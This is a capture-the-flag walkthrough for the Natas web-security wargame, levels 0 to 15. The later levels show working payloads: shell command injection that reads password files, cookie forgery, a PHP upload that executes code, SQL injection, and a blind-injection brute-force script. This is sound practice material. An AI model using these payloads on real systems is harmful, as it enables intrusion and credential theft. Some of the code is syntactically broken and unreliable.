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Natas 0

Username: natas0 Password: natas0 URL:

We will get a comment in while inspecting as:

We found the pass!!

Natas 1

Username: natas1 Password: g9D9cREhslqBKtcA2uocGHPfMZVzeFK6 URL:

Open terminal and use curl -u natas1:g9D9cREhslqBKtcA2uocGHPfMZVzeFK6 command to get the html code of the website.

After analyzing the code you will get a comment:

We found the pass!!

Natas 2

Usename: natas2 Password: h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7 URL:

After entering the website, inspect the site and analyze the html code.

You will get a image code on the path /files/pixel.png .

Edit the path in the browser as and check for the existence of any other files in it.

You will be shown up with a file named user.txt, open the file.

We found the pass!!

Natas 3

Username: natas3 Password: G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q URL:

While inspecting you will be getting a message saying "Not even google will find it this time".

Go with changing the path to robots.txt and hence you will get a path /s3cr3t/, navigate to it.

You will get a file named users.txt, and you will get the password for the next level.

The final path would be like:

Natas 4

Username: natas4 Password: tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm URL:

Here the website mentioned that the website should refer the login of the natas4 site to get the website.

I used burpe suite to intercept the request to set the referer.

For that open the burpe suite and go with capturing the request in proxy and intercept the requests.

Add a line Referer: and forward the request.

Swipe on to the browser.

Hurray!! we got the pass.

Natas 5

Username: natas5 Password: Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD URL:

The website mentions like that we are not logged in!

Inspect the page and go to the cookies option availble at applications.

There you can see that the loggedin value is 0, change it into 1 and refresh the page.

We got the pass!!

Natas 6

Username: natas6 Password: fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR URL:

We could see a input bar in this website;

Inspect the page, you will note this /includes/ in it.

Add the path to the browser.

You will get a string $secret = "FOEIUWGHFEEUHOFUOIU"- it is the thing we need to search in the web page.

We got the pass!!

Natas 7

Username: natas7 Password: jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr URL:

We got a hint by inspecting the website:

Update the path as:

Hurray!! We got the pass.

Natas 8

Username: natas8 Password: a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB URL:

We got from the source code that: $encodedSecret = "3d3d516343746d4d6d6c315669563362"

And the type of encoding is specified as: bin2hex(strrev(base64_encode($secret)))

So we need to decrypt the encoded value in the reverse way as decode hex, reverse the string and decode the base64 string.

Input the resultant string in the secret input bar and we will find the pass.

Natas 9

Username: natas9 Password: Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd URL:

I could see the source code is excecuting command in its program like grep.

So let us try cat command in the search bar to view the passwd file with the commad: ;cat /etc/natas_webpass/natas10

Hurray!! We got the pass.

Natas 10

Username: natas10 Password: D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE URL:

This one is likely as such as the previous one but it is mentioned that in the source code to not to use '/[;|&]/'

So we try it with the command: .* cat /etc/natas_webpass/natas11 #

And it worked!!

Natas 11

Username: natas11 Password: 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg URL:

We get that the cookies were encryted using xor cipher and the algorithm of the encryption was mentioned in the source code.

The encrypted cookie can be found at the application->cookie options in the inspect option. The code for decrypting the key:

$cookie = "MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY=";  

function xor_encrypt($in) {  

  $key = json_encode(array( "showpassword"=>"no", "bgcolor"=>"#ffffff"));  
  $text = $in;  
  $outText = '';  

  // Iterate through each character  
 for($i=0;$i<strlen($text);$i++) {  
 $outText .= $text[$i] ^ $key[$i % strlen($key)];  

 return $outText;  
echo xor_encrypt(base64_decode($cookie)); 

After getting the key, encode the cookie with the key using the program:

$data = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff");  
function xor_encrypt($in) {  
    $key = '';  
    $text = $in;  
    $outText = '';  

    // Iterate through each character  
    for($i=0;$i<strlen($text);$i++) {  
    $outText .= $text[$i] ^ $key[$i % strlen($key)];  

    return $outText;  
echo base64_encode(xor_encrypt(json_encode($data)));

You will get the proper cookie as:MGw7JCQ5OC04PT8jOSpqdmk3LT9pYmouLC0nICQ8anZpbS4qLSguKmkz Change the cookie in the website and reload.

We got the password!!

Natas 12

Username: natas12 Password: YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG URL:

By observing the website and the source code, we can upload a file to the backend and excecute commands by scripting inside the file. As it is looking for jpg, we are going to make a jpg file to upload.

We need to store the command: inside the file. Here we try to access the passwd file in the web server. To input the file as a php excecutable file we change the extension from jpg to php on the inspect tab filename=suhgvsdfg.jpg.

Uploading the file redirects to a hyperlink following password.

Natas 13

Username: natas13 Password: lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9 URL:

This challenge is same as the last challenge, but we have some conditions to upload the file. we need a file showing its signature to be a jpg file.

For that we add the signature as the hex values FF D8 FF DB in the firstln of the file using hexeditor.

After changing the hex value will result in password!!

Natas 14

Username: natas14 Password: qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP URL:

This level is basically doing with sql injection.

After analyzing the source code inthe website, the variable $Query has the user and password credential that has been enterrred by the user. In that there '"' mentioned in both username and the password. Also we can see condition $query,$link value greater than zero excecutes the successful login.

So let's try this username in the username bar keerthi" or 1=1 #

where I commented after getting the true value to avoid unwanted stuffs.

We got the pass!!

Natas 15

Username: natas15 Password: TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB URL:

We are going to do blind SQl injection in the website to get the password.

As we're looking for the password for the natas16, let's try the username as natas16... And it exists.

We use python to break the password charset. code for finding the charset via bruteforce method of checking as follows:

import requests
target = ''
charset_0 = (
        '0123456789' +
        'abcdefghijklmnopqrstuvwxyz' +
charset_1 = ''

for c in charset_0:
        username = ('natas16" AND password LIKE BINARY "%' + c +'%" "')
        r = requests.get(target,
                params={"username": username}
        if "This user exists" in r.text:
                charset_1 += c
                print ('CSET: ' + charset_1.ljust(len(charset_0), '*'))

Excecuting this code will result us with the charset of password that we need to look for bruteforcing:"23579adfgijklqruADEHOPRTVZ"

After getting the charset go with iterating each value of the charset seperate addon with each and bruteforce it with the site for checking it with the password.

Now let's try to perform a brute force attack against a 32 chars string (previous passwords were 32 chars strings) with this Python script

The code for it as follows:

import requests
target = ''
charset_1 = "23579adfgijklqruADEHOPRTVZ"

password = ""
while len(password) != 32:
        for c in charset_1:
                t = password + c
                username = ('natas16" AND password LIKE BINARY "' + t +'%" "')
                r = requests.get(target,
                        params={"username": username}
                if "This user exists" in r.text:
                        print ('PASS: ' + t.ljust(32, '*'))
                        password = t

We will be getting the password for the next level as "TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V"


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